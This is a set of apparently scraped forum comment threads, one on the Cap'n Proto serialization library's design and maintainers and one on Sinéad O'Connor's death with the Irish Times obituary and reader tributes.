- delta-encoding
If you ignore these, flat binary serialization is trivial.
No library provides a good solution that covers the two points above.
Tell me about your uses of capn proto.
I'm using Cap'N Proto in a message broker application(LcuidMQ) I'm building for serialization. It has allowed me to created client applications rather quickly. There are some quirks can be difficult to wrap your head around, but once you understand it is really solid.
There are some difference between the language libraries and documentation can be lacking around those language specific solutions. I'm hoping to add blog articles and or contribute back to the example of these repositories to help future users who want to dabble.
Check out my repo here for how I use it across Rust and Python, with Golang coming soon: https://github.com/lucidmq/lucidmq
I have some very unfortunate news to share with the Cap'n Proto and Sandstorm communities.
Ian Denhardt (zenhack on HN), a lead contributor to the Go implementation, suddenly and unexpectedly passed away a few weeks ago. Before making a request to the community, I want to express how deeply saddened I am by this loss. Ian and I collaborated extensively over the past three years, and we had become friends.
As the de facto project lead, it now befalls me to fill Ian's very big shoes. Please, if you're able to contribute to the project, I could really use the help. And if you're a contributor or maintainer of some other implementation (C++, Rust, etc.), I would *REALLY* appreciate it if we could connect. I'm going to need to surround myself with very smart people if I am to continue Ian's work.
RIP Ian, and thank you. I learned so much working with you.
------
P.S: I can be reached in the following places
- https://github.com/lthibault
- https://matrix.to/#/#go-capnp:matrix.org
- Telegram: @lthibault
- gmail: louist87
I'm so sad to hear this. I didn't know him but hugely admired the work he did on Tempest (his recent fork of Sandstorm, attempting to revive the project). Thank you for letting us know.
Oh gosh, I didn't know that. Thank you for sharing :( I really loved his blog. That's awful.
I've had a couple people suddenly taken from me, and it is soul crushing. Every time it happens it reminds me of how fragile life is, and how quickly things can change. I've started trying to enjoy the small things in life more, and while I don't neglect the future, I also try to enjoy the present.
He has left an amazing legacy that has touched a lot of people. RIP Ian.
That is really sad news. Ian was an inspiration. Sorry for your loss and the loss of the whole community. He will be greatly missed.
I'm excited by Cap'n Proto's participation in the OCAPN standardization effort. Can you speak to if that's going to be part of the Cap'n Proto 2.0 work?
Sadly, the person leading that participation, Ian 'zenhack' Denhardt, recently and unexpectedly passed away.
For my part, I'm a fan of OCapN, but I am not sure how much time I can personally commit to it, with everything on my plate.
I wish I had better news here. This was a tragic loss for all of us.
It's a testament to the subtlety of software engineering that even after four tries (protobuf 1-3, capn proto 1) there are still breaking changes that need to be made to the solution of what on the surface appears to be a relatively constrained problem.
Of course, nothing is ever 'solved'. :)
I assume you are talking about the cancellation change. This is interesting, actually. When originally designing Cap'n Proto, I was convinced by a capabilities expert I talked to that cancellation should be considered dangerous, because software that isn't expecting it might be vulnerable to attacks if cancellation occurs at an unexpected place. Especially in a language like C++, which lacks garbage collection or borrow checking, you might expect use-after-free to be a big issue. I found the argument compelling.
In practice, though, I've found the opposite: In a language with explicit lifetimes, and with KJ's particular approach to Promises (used to handle async tasks in Cap'n Proto's C++ implementation), cancellation safety is a natural side-effect of writing code to have correct lifetimes. You have to make cancellation safe because you have to cancel tasks all the time when the objects they depend on are going to be destroyed. Moreover, in a fault-tolerant distributed system, you have to assume any code might not complete, e.g. due to a power outage or maybe just throwing an unexpected exception in the middle, and you have to program defensively for that anyway. This all becomes second-nature pretty quick.
So all our code ends up cancellation-safe by default. We end up with way more problems from cancellation unexpectedly being prevented when we need it, than happening when we didn't expect it.
EDIT: Re-reading, maybe you were referring to the breaking changes slated for 2.0. But those are primarily changes to the KJ toolkit library, not Cap'n Proto, and is all about API design... I'd say API design is not a constrained problem.
Any plans to improve the Rust side of things? The API could definitely use some more work/ docs around it.
I intend to continue work on capnproto-rust, at my own pace and according to my own priorities.
Are there any particular pain points that you want to call attention to?
We have a great plethora of binary serialization libraries now, but I've noticed none of them offer the following:
* Specification of the number of bits I want to cap out a field at during serialization, ie: `int` that only uses 3 bits.
* Delta encoding for serialization and deserialization, this would further decrease the size of each message if there is an older message that I can use as the initial message to delta encode/decode from.
Take a look at FAST protocol [1]. It has been around for a while. Was created for market/trading data. There appears to be some open source implementations, but I don't think in general they'd be maintained well since trading is, well, secretive.
> `int` that only uses 3 bits.
CBOR approximates this, since it has several different widths for integers.
> an older message that I can use as the initial message to delta encode/decode from.
General-purpose compression on the encoded stream would do something toward this goal, but some protocol buffers library implementations offer merge functions. The question is what semantics of 'merge' you expect. For repeated fields do you want to append or clobber?
One thing I liked about Ada, the small amount I used it, is it has actual subtypes: you could define a variable as an integer within a specific range, and the compiler would (presumably) choose an appropriate underlying storage type for it.
Most formats use varints, so you can't have a 3-bit int but they will store a 64-bit int in one byte if it fits. Going to smaller than a byte isn't worth the extra complexity and slowness. If you're that space sensitive you need to add proper compression.
By delta compression you mean across messages? Yeah I've never seen that but it's hard to imagine a scenario where it would be useful and worth the insane complexity.
zserio [1] has the former at least. It isn't intended for the same use cases as protobuf/capnproto/flatbutter though; in particular it has no backward or forwards compatibility. But it's great for situations where you know exactly what software is used on both ends and you need small data and fast en-/decoding.
[1] http://zserio.org/doc/ZserioLanguageOverview.html#bit-field-...
I find it surprising how few protocols (besides Cap'n Proto) have promise pipelining. The only other example I can think of is 9p, but that's not a general purpose protocol.
https://capnproto.org/news/2013-12-13-promise-pipelining-cap...
> I find it surprising how few protocols (besides Cap'n Proto) have promise pipelining.
Pipelining is a bad idea. It reifies object instances, and thus makes robust implementation much harder. You no longer make stateless calls, but you are running functions with particular object instances.
And you immediately start getting problems. Basically, Client Joe calls Service A and then pass the promised result of the call to Service B. So that Service B will have to do a remote call to Service A to retrieve the result of the promise.
This creates immediate complications with security boundaries (what is your delegation model?). But what's even worse, it removes the backpressure. Client Joe can make thousands of calls to Service A, and then pass the not-yet-materialized results to Service B. Which will then time out because Service A is being DDoS-ed.
There is also CapnP's moral ancestor CapTP[1]/VatTP aka Pluribus developed to accompany Mark Miller's E language (yes, it's a pun, there is also a gadget called an "unum" in there). For deeper genealogy—including a reference to Barbara Liskov for promise pipelining and a number of other relevant ideas in the CLU extension Argus—see his thesis[2].
(If I'm not misremembering, Mark Miller later wrote the promise proposal for JavaScript, except the planned extension for RPC never materialized and instead we got async/await, which don't seem compatible with pipelining.)
The more recent attempts to make a distributed capability system in the image of E, like Spritely Goblins[3] and the OCapN effort[4], also try for pipelining, so maybe if you hang out on cap-talk[5] you'll hear about a couple of other protocols that do it, if not ones with any real-world usage.
(And I again reiterate that, neat as it is, promise pipelining seems to require programming with actual explicit promises, and at this point it's well-established how gnarly that can get.)
One idea that I find interesting and little-known from the other side—event loops and cooperatively concurrent "active objects"—is "causality IDs"[6] from DCOM/COM+ as a means of controlling reentrancy, see CoGetCurrentLogicalThreadId[7] in the Microsoft documentation and the discussion of CALLTYPE_TOPLEVEL_CALLPENDING in Effective COM[8]—I think they later tried to sell this as a new feature in Win8/UWP's ASTAs[9]?
[1] http://erights.org/elib/distrib/captp/index.html
[2] http://erights.org/talks/thesis/index.html
[3] https://spritely.institute/goblins/
[4] https://github.com/ocapn/ocapn
[5] https://groups.google.com/g/captalk/
[6] https://learn.microsoft.com/openspecs/windows_protocols/ms-d...
[7] https://learn.microsoft.com/windows/win32/api/combaseapi/nf-...
[8] https://archive.org/details/effectivecom50wa00boxd/page/150
[9] https://devblogs.microsoft.com/oldnewthing/20210224-00/?p=10...
As neat as it is I guess it's hard optimize the backend for it compared to explicitly grouping the queries. I imagine a bespoke RPC call that results in a single SQL query is better than several pipelined but separate RPC calls, for example.
But even still, you would think it would be more popular.
Redis transactions [1] also apply pipelining, but AFAICT there is no practical way to use them for implementing generic RPC.
[1] https://redis.com/ebook/part-2-core-concepts/chapter-4-keepi...
Without knowing how exactly capnproto promise pipelining works, when I thought about it, I was concerned about cases like reading a directory and stating everything in it, or getting back two response values and wanting to pass only one to the next call. The latter could be made to work, I guess, but the former depends on eg the number of values in the result list.
I didn't know 9p had promise pipelining!
Or more specifically, it seems to have client-chosen file descriptors, so the client can open a file, then immediately send a read on that file, and if the open fails, the read will also fail (with EBADF). Awesome!
This is great, but 'promise pipelining' also needs support in the client. Are there 9p clients which support promise pipelining? For example, if the user issues several walks, they're all sent before waiting for the reply to the first walk?
Also, it only has promise pipelining for file descriptors. That gives you a lot, definitely, but if for example you wanted to read every file in a directory, you'd want to be able to issue a read and then walk to the result of that read. Which 9p doesn't seem to support. (I actually support this in my own remote syscall protocol library thing, rsyscall :) )
While I never used Cap'n Proto, I want to thank kentonv for the extremely informative FAQ answer [1] on why required fields are problematic in a protocol
I link it to people all the time, especially when they ask why protobuf 3 doesn't have required fields.
[1] https://capnproto.org/faq.html#how-do-i-make-a-field-require...
Avro solves this problem completely, and more elegantly with its schema resolution mechanism. Exchanging schemas at the beginning of a connection handshake is hardly burdensome
Typical provides 'asymmetric' fields to assist with evolution of types:
https://github.com/stepchowfun/typical#asymmetric-fields-can...
>To help you safely add and remove required fields, Typical offers an intermediate state between optional and required: asymmetric. An asymmetric field in a struct is considered required for the writer, but optional for the reader. Unlike optional fields, an asymmetric field can safely be promoted to required and vice versa.
From the FAQ [1]
> The right answer is for applications to do validation as-needed in application-level code.
It would've been nice to include a parameter to switch 'required message validation' on and off, instead of relying on application code. Internally in an application, we can turn this off, the message bus can turn it off, but in general, developers would really benefit from this being on.
[1] https://capnproto.org/faq.html#how-do-i-make-a-field-require...
This is some very valuable perspective. Personally, I previously also struggled to understand why. For me, the thing that clicked was to understand protobuf and Cap'n proto as serialization formats that need to work across API boundaries and need to work with different versions of their schema in a backwards- and forwards-compatible way; do not treat them as in-memory data structures that represent the world from the perspective of a single process running a single version without no compatibility concerns. Thus, the widely repeated mantra of 'making illegal states unrepresentable' does not apply.
Can't we extend this argument to eliminating basically all static typing? And frankly that'd not even be wrong, and is why Alan Kay defined OOP as one that's dynamically typed and late bound, and we went against it anyway to keep relearning the same lessons over and over.
Very good point.
A gotcha along the same path. Deserialization of things not needed as what you get with generated clients. An aspect of interfaces in Go I really like. Remotely type what I use. Skip the rest. Not fun to have incidents caused by changes to a contract that is not even used by a service. Also hard to find.
That FAQ answer has a very nice parallel with Hickey's video of a similar topic: https://m.youtube.com/watch?v=YR5WdGrpoug&feature=youtu.be
Congrats on the release! It must be very exciting after 10 years :)
If you don't mind the question: will there be more work on implementations for other languages in the future? I really like the idea of the format, but the main languages in our stack aren't supported in a way I'd use in a product.
This is indeed the main weakness of Cap'n Proto. I only really maintain the C++ implementation. Other implementations come from various contributors which can lead to varying levels of completeness and quality.
Unfortunately I can't really promise anything new here. My work on Cap'n Proto is driven by the needs of my main project, the Cloudflare Workers runtime, which is primarily C++. We do interact with Go and Rust services, and the respective implementations seem to get the job done there.
Put another way, Cap'n Proto is an open source project, and I hope it is useful to people, but it is not a product I'm trying to sell, so I am not particularly focused on trying to get everyone to adopt it. As always, contributions are welcome.
The one case where I might foresee a big change is if we (Cloudflare) decided to make Cap'n Proto be a public-facing feature of the Workers platform. Then we'd have a direct need to really polish it in many languages. That is certainly something we discuss from time to time but there are no plans at present.
There are people who have tried to write the RPC layer without it simply being a wrapper around the C++ implementation, but it's a LOT of code to rewrite for not a lot of direct benefit.
Feel free to take a crack at it. People would likely be rather cooperative about it. However, know that it's just simply a lot of work.
I always liked the idea of capnp, but it bothers me that what is ultimately a message encoding protocol has an opinion on how I should architect my server.
FWIW, gRPC certainly has this problem too, but it's very clearly distinct from protobuf, although pb has gRPC-related features.
That entanglement makes me lean towards flatbuffers or even protobuf every time I weigh them against capnp, especially since it means that fb and pb have much simpler implementations, and I place great value on simplicity for both security and maintenance reasons.
I think the lack of good third-party language implementations speaks directly to the reasonability of that assessment. It also makes the bus factor and longevity story very poor. Simplicity rules.
Part of the problem with cap'n'proto whenever I've approached it is that not only does it have an opinion on how to architect your server (fine, whatever) but in C++ it ends up shipping with its own very opinionated alternative to the STL ('KJ') and when I played with it some years ago it really ended up getting its fingers everywhere and was hard to work into an existing codebase.
The Rust version also comes with its own normative lifestyle assumptions; many of which make sense in the context of its zero-copy world but still make a lot of things hard to express, and the documentation was hard to parse.
I tend to reach for flatbuffers instead, for this reason alone.
Still I think someday I hope to have need and use for cap'n'proto; or at least finish one of several hobby projects I've forked off to try to use it over the years. There's some high quality engineering there.
653 points 6 days ago by jbegley in 53rd position
www.irishtimes.com | Estimated reading time – 10 minutes | comments | anchor
Irish singer Sinéad O'Connor has died at the age of 56, her family has announced.
In a statement, the singer's family said: "It is with great sadness that we announce the passing of our beloved Sinéad. Her family and friends are devastated and have requested privacy at this very difficult time."
The acclaimed Dublin performer released 10 studio albums, while her song Nothing Compares 2 U was named the number one world single in 1990 by the Billboard Music Awards. Her version of the ballad, written by musician Prince, topped the charts around the globe and earned her three Grammy nominations.
The accompanying music video, directed by English filmmaker John Maybury, consisted mostly of a close-up of O'Connor's face as she sung the lyrics and became as famous as her recording of the song.
In 1991, O'Connor was named artist of the year by Rolling Stone magazine on the back of the song's success.
O'Connor was presented with the inaugural award for Classic Irish Album at the RTÉ Choice Music Awards earlier this year.
Sinéad O'Connor receives the Classic Irish Album award for I Do Not Want What I Haven't Got at the RTÉ Choice Music Prize at Vicar Street on March 9th. Photograph: Kieran Frost/Redferns
The singer received a standing ovation as she dedicated the award for the album, I Do Not Want What I Haven't Got, to "each and every member of Ireland's refugee community".
"You're very welcome in Ireland. I love you very much and I wish you happiness," she said.
President Michael D Higgins led the tributes to O'Connor, saying his "first reaction on hearing the news of Sinéad's loss was to remember her extraordinarily beautiful, unique voice".
"To those of us who had the privilege of knowing her, one couldn't but always be struck by the depth of her fearless commitment to the important issues which she brought to public attention, no matter how uncomfortable those truths may have been," he said.
[ Sinéad O'Connor on her teenage years: 'I steal everything. I'm not a nice person. I'm trouble' ]
"What Ireland has lost at such a relatively young age is one of our greatest and most gifted composers, songwriters and performers of recent decades, one who had a unique talent and extraordinary connection with her audience, all of whom held such love and warmth for her ... May her spirit find the peace she sought in so many different ways."
Taoiseach Leo Varadkar expressed his sorrow at the death of the singer in a post on social media. "Her music was loved around the world and her talent was unmatched and beyond compare. Condolences to her family, her friends and all who loved her music," said Mr Varadkar.
Tánaiste Micheál Martin said he was "devastated" to learn of her death. "One of our greatest musical icons, and someone deeply loved by the people of Ireland, and beyond. Our hearts goes out to her children, her family, friends and all who knew and loved her," he said.
Minister for Culture and Arts Catherine Martin said she was "so sorry" that the "immensely talented" O'Connor had died.
"Her unique voice and innate musicality was incredibly special ... My thoughts are with her family and all who are heartbroken on hearing this news Ní bheidh a leithéid arís ann."
Sinn Féin vice president Michelle O'Neill said Ireland had lost "one of our most powerful and successful singer, songwriter and female artists".
"A big loss not least to her family & friends, but all her many followers across the world."
O'Connor drew controversy and divided opinion during her long career in music and time in public life.
In 1992, she tore up a photograph of Pope John Paul II on US television programme Saturday Night Live in an act of protest against child sex abuse in the Catholic Church.
Sinéad O'Connor tears up a photo of Pope John Paul II during a live appearance in New York on NBC's Saturday Night Live on October 5th,1992. Photograph: NBC-TV/AP
"I'm not sorry I did it. It was brilliant," she later said of her protest. "But it was very traumatising," she added. "It was open season on treating me like a crazy bitch."
The year before that high-profile protest, she boycotted the Grammy Awards, the music industry's answer to the Oscars, saying she did not want "to be part of a world that measures artistic ability by material success".
She refused the playing of US national anthem before her concerts, drawing further public scorn.
In more recent years, O'Connor became better known for her spiritualism and activism, and spoke publicly about her mental health struggles.
In 2007, O'Connor told US talkshow Oprah Winfrey that she had been diagnosed with bipolar disorder four years previously and that before her diagnosis she had struggled with thoughts of suicide and overwhelming fear.
She said at the time that medication had helped her find more balance, but "it's a work in progress". O'Connor had also voiced support for other young women performers facing intense public scrutiny, including Britney Spears and Miley Cyrus.
O'Connor, who married four times, was ordained a priest in the Latin Tridentine church, an independent Catholic church not in communion with Rome, in 1999.
The singer converted to Islam in 2018 and changed her name to Shuhada Sadaqat, though continued to perform under the name Sinéad O'Connor. In 2021, O'Connor released a memoir Rememberings, while last year a film on her life was directed by Kathryn Ferguson.
On July 12th, O'Connor posted on her official Facebook page that she had moved back to London, was finishing an album and planned to release it early next year. She said she intended to tour Australia and New Zealand towards the end of 2024 followed by Europe, the United States and other locations in early 2025.
The circumstances of her death remain unclear.
O'Connor is survived by her three children. Her son, Shane, died last year aged 17.
Former Late Late Show host Ryan Tubridy said he was "devastated" by the news of O'Connor's death.
"We spoke days ago and she was as kind, powerful, passionate, determined and decent as ever," he said in a post on Instagram.
Addressing O'Connor directly, he said: "Rest in peace Sinéad, you were ahead of your time and deserve whatever peace comes your way."
Broadcaster Dave Fanning said O'Connor would be remembered for her music and her "fearlessness" and "in terms of how she went out there all the time, believed in everything she was doing, wasn't always right and had absolutely no regrets at all".
Canadian rock star Bryan Adams said he loved working with the Irish singer. "I loved working with you making photos, doing gigs in Ireland together and chats, all my love to your family," he tweeted.
REM singer Michael Stipe said: "There are no words," on his Instagram account alongside a photograph he posted of himself with O'Connor.
Hollywood star Russell Crowe posted a story on Twitter recounting a chance meeting with O'Connor – whom he described as "a hero of mine" – outside a pub in Dalkey, south Dublin, while he was working in Ireland last year.
"What an amazing woman. Peace be with your courageous heart Sinéad," he tweeted.
Billy Corgan, lead singer of American rock band The Smashing Pumpkins, said O'Connor was "fiercely honest and sweet and funny".
"She was talented in ways I'm not sure she completely understood," he said.
Ian Brown of The Stone Roses tweeted: "RIP SINEAD O'CONNOR A Beautiful Soul. Hearin Collaborating with and hearing Sinead sing my songs in the studio in Dublin was magical and a highlight of my musical life."
Musician Tim Burgess of the Charlatans said: "Sinead was the true embodiment of a punk spirit. She did not compromise and that made her life more of a struggle. Hoping that she has found peace."
American rapper and actor Ice T paid tribute to O'Connor, saying she "stood for something". In a Twitter post, he wrote: "Respect to Sinead ... She stood for something ... Unlike most people ... Rest Easy".
The Irish Music Rights Organisation (IMRO) said: "Our hearts go out to family, friends, and all who were moved by her music, as we reflect on the profound impact she made on the world."
Irish band Aslan paid tribute to O'Connor – both originating from Dublin. O'Connor collaborated with the band on Up In Arms in 2001.
Aslan lead singer Christy Dignam died in June.
A post on the band's Facebook page read: "Two Legends taken from us so closely together... No words ... Rest in Peace Sinead".
British singer Alison Moyet said O'Connor had a voice that "cracked stone with force by increment". In a post on Twitter, she wrote: "Heavy hearted at the loss of Sinead O'Connor. Wanted to reach out to her often but didn't. I remember her launch. Astounding presence. Voice that cracked stone with force & by increment.
"As beautiful as any girl around & never traded on that card. I loved that about her. Iconoclast."
US film and TV composer Bear McCreary reflected on writing new songs with the "wise and visionary" Sinead O'Connor in a social media post. McCreary tweeted that he was "gutted".
"She was the warrior poet I expected her to be — wise and visionary, but also hilarious. She and I laughed a lot. We were writing new songs together, which will now never be complete. We've all lost an icon. I've lost a friend. #RIP."
The pair had worked together on the latest version of the theme for Outlander.
Her performance on SNL was a sign-act (prophetic gesture) in the purest sense of the word.
There are a number of flagged comments which don't deserve it. And as long as there is no outlet for objecting to poor flagging decisions, I'll use the comments section to call attention to it.
If we are going to have a discussion about a performer unafraid of controversy and who struggled with mental and spiritual concerns publicly, a robust conversation should be allowed.
The flagged comments I'm aware of are either taking the thread into flamewar, and/or on generic tangents. Those are correct uses of flags. If there's something I've missed about this, I'm happy to take a look, but I'd need a specific link.
'Robust' can mean a lot of things. HN's intended purpose is curious conversation. If we allow the predictably-outraged type of thread here, it will quickly take over discussion of most stories. If that happens, it will quickly destroy the forum. This is not a small risk—it's the biggest one. It would be foolish not to take it seriously, and we work hard to prevent it.
Ironically, that sometimes leads to the perception that the forum is fine, so why not allow a few robust fires to burn here and there? The answer is that the forum is not fine. It's at constant risk of burning to a crisp [1], and our primary responsibility is to stave that off [2], to the extent that we can.
That said, if there's truly high-quality conversation going on in any of these flagged subthreads, I'd like to see it. My experience in general is that flamewar doesn't go along with high-quality conversation at all. It's extremely exciting, of course—but from an intellectual-curiosity point of view, inert and boring, as anything predictable is [3].
https://news.ycombinator.com/newsguidelines.html
[1] https://hn.algolia.com/?dateRange=all&page=0&prefix=true&que...
[2] https://hn.algolia.com/?dateRange=all&page=0&prefix=true&que...
[3] https://hn.algolia.com/?dateRange=all&page=0&prefix=false&so...
The irony of being outlived by Shane MacGowan.
He has outlived Kirsty MacColl (co-singer on Fairytale of New York) by 23 years and counting. Her death was a tragedy.
I remember being outraged at her tearing up John Paul II's picture. The media in the U.S. did a great job of hiding why she did it. I was not outraged at her when I found out her justified reasons for doing so. That was the first time I became consciously aware that news is a business and that that business thrives when it generates outrage. I no longer fall victim to this.
She's far more the saint than that bastard John Paul II.
EDIT: Ironic this is flagged. I'm proud of this actually. I feel a slight kinship with Sinead now. In honor of her death would that we all, in our own way, tear to shreds the image of John Paul II!
Same.
As a child, I thought the Pope and the church helped poor people and practiced showing people how to be good to each other by following the ten commandments. When Sinead O Connor ripped up the picture of the Pope on SNL I remember asking why.
Someone said the reason was because she was crazy. They were lying to me.
Sinead O'Connor was drawing attention to child sexual abuse when nobody else was.
> She's far more the saint than that bastard John Paul II.
I don't know about JP2's involvement in child sexual abuse (not doubting you, just saying I don't know *) but Ratzinger / Benedict absolutely deliberately prevented investigation into, and facilitated (by moving rapist priests into new parishes), child sexual abuse.
Years later I apologized to O'Connor on Twitter and she took it with grace.
* Update: some research showed the Vatican, under JP2, opposed extensions of the statutes of limitations in sex abuse cases.
Do you not think your comment would have been better without the final sentence?
You started a religious flamewar and then poured fuel into it in multiple places. That's why your comment is flagged. Please don't post like that here.
Your comment was just fine in the first paragraph and broke the site guidelines with the second paragraph—not because we care what you think about popes, but because such swipes predictably lead to internet dreckfests and we're simply trying to have a forum that doesn't suck. At least to the extent possible.
This was arguably one of the first 'cancellations' before 'cancel culture' was a thing we were talking about.
Right or wrong, what she did was definitely courageous and arguably destroyed her career.
I have known about her since Nothing Compares 2 U, but not known that much else about her career since then. I thought she was kind of a one hit wonder, as talented as she were she never got another hit close to as successful as that one. Do you think this is an unfair description?
Her goal was not to collect hits, and the one was a fluke that surprised everyone involved. Up to each person to decide how important that is to them, I suppose.
I am deeply saddened by her passing. Her performances always featured powerful vocals driven by equally powerful emotion.
But her version of Pink Floyd's 'Mother,' performed live in Berlin in 1990 with Roger Waters, Rick Danko, Levon Helm, and Garth Hudson, was Sinead at her most vulnerable and in my opinion, a full expression of her soul.
Audio with onstage video: https://www.youtube.com/watch?v=QRbKXACBaoc
High quality audio only: https://www.youtube.com/watch?v=LSd0Yl5mDuU
Trivia: Those recordings of her are mostly from the dress rehearsal the night before. They had power issues during her live performance and she refused to come back onstage after the show to record another take. So the concert-goers didn't get to hear this version.
I was in Berlin a few days before and attended what was the best concert I ever attended, it was a double header, Sinead and Midnight Oil - it was just her and a tape deck and absolutely brilliant
My favourite song too, heartbreaking knowing the abuse she suffered at the hands of her own mother.
I always had immense respect for her decision to shave her head when told by music execs to 'sex it up.' She was gorgeous but she was a singer. She wanted to be hired for her singing.
Being a pretty young woman shouldn't be such a ridiculous hardship. And I kind of wonder how much that radicalized her and how that factors into her conversion to Islam.
Perhaps that was her reasoning, but it turned out to be a highly marketable look which would not have worked for someone without such a beautiful, feminine facial structure.
What I respect her for is having the balls to make a political statement about Catholic child abuse when the topic was far, far outside the Overton window. That was a career sacrifice, and years later she turned out to be right.
This comment seems offensive and feels like you associating radicalization with Islam
Wow, I always liked Sinead and her music but didn't realize that was the reason for her haircut. Big up to her.
on Twitter in November 2018. She wrote: 'What I'm about to say is something so racist I never thought my soul could ever feel it. But truly I never wanna spend time with white people again (if that's what non-muslims are called). Not for one moment, for any reason. They are disgusting.'
https://en.wikipedia.org/wiki/Sin%C3%A9ad_O%27Connor#Tweets_...
Why not include the whole text though?
> Later that month, O'Connor stated that her remarks were made in an attempt to force Twitter to close down her account.[99] In September 2019, she apologised for the remarks, saying 'They were not true at the time and they are not true now. I was triggered as a result of Islamophobia dumped on me. I apologize for hurt caused. That was one of many crazy tweets lord knows.'
It's a shitty thing to write but she's also someone who had very openly struggled with poor mental health for basically all of her life. I've a hard time holding something as thoughtless - in a very literal sense - as that against her.
She never deserved to be shunned.
Even if you strongly agree with her criticism of the pope, the way that she expressed that criticism -- by deceiving everyone on SNL to pull off her stunt -- certainly branded her as a loose cannon in the industry. Unpredictability might entertain audiences, but it's a huge liability from an entertainment industry perspective.
And arguably, her antics greatly overshadowed the message she was trying to get across. How many people even realized what she was criticizing? So it ended up pissing off a lot of people without actually being effective in drawing attention to the issue she wanted to raise awareness toward.
Looking back 30 years later, it's really hard to understand. If it was today, it would barely be a blip.
It's hard not to laugh whenever people talk about 'cancel culture' being a new phenomenon. The amount of hate she received for merely bringing up the horrible actions the catholic church committed was absurd.
'We belong to Allah, and to Him we return.'[1]
[1] Inna Lillahi wa inna ilayhi raji'un:
https://en.wikipedia.org/wiki/Inna_Lillahi_wa_inna_ilayhi_ra...
We belong to ourselves, and only the weak-minded allow themselves to become enslaved by another. Free yourself.
> She refused the playing of US national anthem before her concerts, drawing further public scorn.
Was this a thing?!
A good episode of 'You're Wrong About...' covers the controversy of her:
https://open.spotify.com/episode/265qKOV5C7XBqlyXMjp7VF
https://podcasts.apple.com/at/podcast/sin%C3%A9ad-oconnor-wi...
I used to refuse to stand for the pledge of allegiance in high school and get threatened with being beat up, I guess it was a thing at the time.
Perhaps it was only a thing at the Garden State Arts Center (now the PNC Bank Arts Center)? Here's a Washington Post story at the time: https://www.washingtonpost.com/archive/lifestyle/1990/08/28/...
The Garden State Arts Center, which always starts its shows by playing the anthem, gave in to the singer's demand, fearing that a last-minute cancellation would enrage the audience of 9,000, but prohibited any future appearances by the hit singer.
The first time I heard the song -- and saw the video -- to 'Nothing Compares 2 U' and the screen is nothing but her face and at one point there are tears, and she blares that unreal voice, I think I stopped breathing.
She will be missed.
At the risk of being obvious, see also Dreyer's 1928 La Passion de Jeanne d'Arc (https://vimeo.com/169369684).
She had the same intent look in this recording of Molly Malone: https://www.youtube.com/watch?v=3ouqhCtIh2g
Nothing Compares 2 U reliably induces frisson/goosebumps in me. Rare that a cover can match a Prince original: https://en.wikipedia.org/wiki/Nothing_Compares_2_U
What a legend. It's hard to overstate how much pushback and shit was thrown at her when she ripped up a picture of the Pope on SNL in 1992 to protest church child abuse. It's also hard to overstate how incredibly prescient and correct she was in her outrage. Catholic church child sex abuse didn't really enter the national debate until a decade later.
Willingly and knowingly threw away a promising mainstream pop career to make that statement. Eternal respect.
I was growing up in Poland in the height of John Paul II cult. I was raised in atheist family and I was getting some tidbits about my grandfathers brother who was sexually assaulted by a priest.
Today it sounds a little bit silly but that SNL performance was the validation I needed to navigate my environment outside my home.
Now I learned a lot about issues in Catholic Church and I understand this stuff better but I'll be forever grateful for this small gesture of solidarity. Even if it wasn't directed at me.
It doesn't sound silly at all to me. I was also raised atheistically, but in a fiercely Catholic family in Ireland. I never saw this at the time, but I knew it happened.
To my shame, I thought she was uncool for years after. I think I picked it up from others at the time (I was in a Catholic primary school).
Ironically, even though it was apparently common knowledge amongst my Catholic country- and family-members, it took years for for me to believe that that kind of systematic abuse could have happened.I have dedicated a part of my resources and efforts to eradicate the Catholic church and other radical religions from my country
Archbishop Wojtyła helped overthrow communist regime in the Polish People's Republic, which caused significant hardship among Polish people.
Her first recorded song was with The Edge on the criminally overlooked soundtrack for 'Captive': https://www.youtube.com/watch?v=BvKV4_9nV2M
[flagged]
Please don't take HN threads into religious flamewar. That's a circle of hell we're trying our best to avoid here.
Geez, only 56 years old. Seems like a lot of Gen X artists are passing away much earlier than the generation before them.
https://en.wikipedia.org/wiki/27_Club
The 27 Club is an informal list consisting mostly of popular musicians, artists, actors, and other celebrities who died at age 27.
Brian Jones, Jimi Hendrix, Janis Joplin, and Jim Morrison all died at the age of 27 between 1969 and 1971. At the time, the coincidence gave rise to some comment, but it was not until Kurt Cobain's 1994 suicide, at age 27, that the idea of a '27 Club' began to catch on in public perception.
What how, she is so young. That is super sad.
She lost her son of 17 years only 5 months ago. With no additional details, I know where my mind goes.
Edit: whatever article I read said 5 months ago, but that appears to have been written some time ago. Plenty of articles stating that Shane died in Jan/2022:
https://duckduckgo.com/?t=ffab&q=shane+oconnor+wikipedia&ia=...
Announcing her conversion, she said, 'This is to announce that I am proud to have become a Muslim. This is the natural conclusion of any intelligent theologian's journey. All scripture study leads to Islam. Which makes all other scriptures redundant.'
That sort of phrasing is almost to be expected, no? This might just be a cynical atheist's interpretation of Abrahamic religions, but Islam seems to be loosely doing the same thing to Christianity that Christianity did to Judaism, i.e. it purports to be the next theological evolution and therefore all practioniers of {current_religion} should rationally convert and download the latest religious firmware.
I was going to make a joke about how it's a shame they stopped inventing Abrahamic religions, but then I remembered the Mormons! I would like to suggest that Mormonism is the true natural conclusion of any intelligent theologian's journey. At least until someone creates a new Abrahamic religion to succeed it.
This hit me hard. The first of her songs I ever knew, and still my favorite, was 'Troy' and I was just thinking of it this morning. Then an hour later someone tweeted that she had died. Probably going to be sad all day.
What an incredible album. Jackie and Just Call me Joe are songs I always love to hear.
In the Netherlands this was her most well know song. I was teenager when Troy was a hit on the radio, the video was intriguing. It hits me too, I feel respect for her, though I sometimes had doubts about some ideas she put forward.
She'll be missed. As a youngster growing up in Ireland she not only gave a voice to all of us who wanted to reject the influence of the church, which had only become more entrenched throughout the conflict, but also to the women of this island who had been previously silenced for centuries.
If anyone is interested more in feminist voices from the conflict in Ireland I can highly recommend the 1981 film Maeve. The idea of women being a 'third side' in the whole conflict who had never been given voice was incredibly eye opening to me as a man moving into my 30s and changed my perspective not only on Irish history but entire history of Europe and the Middle East.
Anything covering Magdalene laundries or other catholic institutions in Ireland are pretty relevant too. She did spend a bunch of her childhood in one.
Saw her live in NYC back in 2005 when she was doing roots reggae.
Sly & Robbie was the rhythm section, with Burning Spear on vocals and percussion. Maybe Mikey Chung on guitar?
I was totally surprised at the combination — this Crazy Baldhead amongst Dreads — but one of the best live shows I've been to. Surrounded by reggae icons, she was a boss on that stage.
Big up Sinéad! An incredible musician.
That was likely due to her collaborations with both Adrian Sherwood/On-U Sound initially, but she was a long time admirer of roots and dubwise. The caribbean influence in UK/Irish pop culture is much stronger than in the US (other than hip hop).
